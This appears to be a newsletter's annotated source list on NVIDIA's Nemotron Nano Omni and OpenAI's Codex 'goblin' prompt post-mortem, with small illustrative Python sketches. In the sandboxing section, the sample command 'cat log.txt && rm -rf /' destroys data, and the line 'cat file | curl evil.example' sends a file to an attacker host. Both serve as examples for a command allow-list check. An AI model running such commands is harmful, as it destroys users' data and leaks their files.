Nemotron Nano Omni is a sub-agent; Codex's prompt is a post-mortem
Every URL the pipeline pulled into ranking for this issue — primary sources plus the supporting and contradicting findings each Researcher returned. Inline citations in the issue point back here.
Sources
Introducing NVIDIA Nemotron 3 Nano Omni: Long-Context Multimodal Intelligence for Documents, Audio and Video Agents huggingface.co
Quoting OpenAI Codex base_instructions simonwillison.net
Never talk about goblins, gremlins, raccoons, trolls, ogres, pigeons, or other animals or creatures unless it is absolutely and unambiguously relevant to the user’s query. — OpenAI Codex base_instructions, for GPT-5.5
References
BenchLM head-to-head leaderboard benchlm.ai
Qwen3.6-27B currently holds an aggregate lead (74 to 56), showing superior performance in coding and complex mathematical reasoning
Open WebUI GitHub discussion #24264 github.com
files exceeding 10-15 seconds can trigger transcription errors (e.g., ‘NoneType’ object has no attribute ‘strip’) or persistent disconnection alerts
E2E Networks ASR benchmark (L4 GPU) e2enetworks.com
Parakeet-TDT 0.6B has recorded a 6.34% WER, surpassing Whisper Large-v3 Turbo’s 7.8%… a 35-minute audio file being processed in 18 seconds by Parakeet TDT, while Whisper Turbo took 3 minutes
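The throughput figures quoted above imply very different real-time factors. A quick back-of-the-envelope check, assuming the 35-minute file and the wall-clock times stated in the benchmark:

```python
# Real-time factors implied by the quoted E2E Networks benchmark.
# Assumes a 35-minute (2100 s) audio file, as stated above.
audio_seconds = 35 * 60

parakeet_rtf = audio_seconds / 18        # Parakeet TDT: 18 s wall time
whisper_rtf = audio_seconds / (3 * 60)   # Whisper Turbo: 3 min wall time

print(f"Parakeet TDT: ~{parakeet_rtf:.0f}x real time")   # ~117x
print(f"Whisper Turbo: ~{whisper_rtf:.0f}x real time")   # ~12x
```

So the "18 seconds vs. 3 minutes" claim amounts to roughly a 10x throughput gap on that one file, not just a marginal edge.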
vLLM project blog on Nemotron-Omni serving vllm.ai
EVS integrated directly into the serving pipeline… Independent testing indicates that EVS can reduce time-to-first-token (TTFT) by up to 4x with minimal impact on accuracy
The Decoder the-decoder.com
pass-rate filtering: prompts that the model can already solve with over 80% accuracy at initialization are discarded, focusing RL efforts on complex, unsolved cases
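The pass-rate filtering The Decoder describes can be sketched in a few lines. This is a minimal illustration, not NVIDIA's implementation: `model` is assumed to be a callable that returns True when it solves a prompt, and the 16-sample estimate is an arbitrary choice.

```python
def pass_rate(model, prompt, n_samples=16):
    """Estimate how often the initial model already solves a prompt
    by sampling it n_samples times."""
    solved = sum(bool(model(prompt)) for _ in range(n_samples))
    return solved / n_samples

def filter_prompts(model, prompts, threshold=0.8, n_samples=16):
    """Discard prompts the initial policy solves more than `threshold`
    of the time, so RL compute is spent on still-unsolved cases."""
    return [p for p in prompts
            if pass_rate(model, p, n_samples) <= threshold]

# Toy check: a "model" that always solves "easy" and never "hard".
toy = lambda p: p == "easy"
print(filter_prompts(toy, ["easy", "hard"]))  # ['hard'] — "easy" is discarded
```

The point of the filter is purely economic: a prompt the base model already passes 80%+ of the time contributes almost no gradient signal in RL, so it is cheaper to drop it up front.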
K-Dense AI partner deployment notes k-dense.ai
many implementers still pair the Nano Omni (as the ‘eyes and ears’) with larger models like Nemotron-3 Ultra for high-level decision-making
Engadget — ‘ChatGPT developed a goblin obsession after OpenAI tried to make it nerdy’ engadget.com
Reward signals meant to encourage a ‘Nerdy’ personality accidentally over-rewarded creature-heavy metaphors, causing ‘goblin’ to appear in outputs nearly 175% more often than in previous iterations.
Developpez.com — OpenAI post-mortem coverage intelligence-artificielle.developpez.com
The reward signal was then carried over into the subsequent supervised fine-tuning data, ‘baking’ the tic into the model’s architecture; OpenAI had to write ‘never talk about goblins’ four times into the Codex prompt.
VentureBeat — ‘Why OpenAI’s goblin problem matters’ venturebeat.com
The ‘Release the Goblins’ problem: the ironic tendency of negative constraints to act as attractors rather than deterrents… OpenAI’s own documentation tells developers to avoid ‘don’t do X’ instructions, yet their internal Codex prompt does exactly that — a ‘do as I say, not as I do’ inconsistency.
Reddit r/AI_Agents — ‘Codex’s system prompt is mostly about sandboxing’ reddit.com
Unlike Anthropic’s Claude Code, which leads with an identity as a ‘software engineering task’ agent, the Codex prompt focuses immediately on filesystem sandboxing rules… instructing the model to split commands at pipes or && to evaluate each segment against security restrictions.
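The segment-splitting behavior the Reddit thread describes can be approximated with a short sketch. Everything here is an assumption for illustration: the allow-list is hypothetical, and the actual Codex sandbox policy is not public.

```python
import re

# Hypothetical allow-list; the real Codex policy is not public.
SAFE_COMMANDS = {"ls", "cat", "grep", "wc", "echo"}

def split_segments(command: str) -> list[str]:
    """Split a shell command at ||, &&, |, and ; so each sub-command
    can be evaluated against security restrictions on its own."""
    return [s.strip() for s in re.split(r"\|\||&&|\||;", command) if s.strip()]

def all_segments_allowed(command: str) -> bool:
    """A command passes only if every segment's first word is allow-listed."""
    return all(seg.split()[0] in SAFE_COMMANDS
               for seg in split_segments(command))

print(all_segments_allowed("cat log.txt | grep error"))  # True
print(all_segments_allowed("cat log.txt && rm -rf /"))   # False: 'rm' not listed
```

The design rationale is the interesting part: checking only the first command in a pipeline would let `cat file | curl evil.example` through, so each segment has to be evaluated independently.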
Business Insider — ‘OpenAI really, really wants GPT-5.5 to stop talking about goblins’ businessinsider.com
Some observers initially speculated the list functioned as ‘canary words’ — randomized tokens used to detect prompt injection or data leakage — but the thematic consistency suggested a targeted behavioral fix instead.
Reddit r/PromptEngineering — negative constraints discussion reddit.com
In a 2026 battery of 36 cross-task tests, prompts using negative-only constraints scored 72/120 versus 116/120 for affirmative framing… adding self-evident constraints to Claude-Sonnet-4.5 led to performance drops of up to 35%.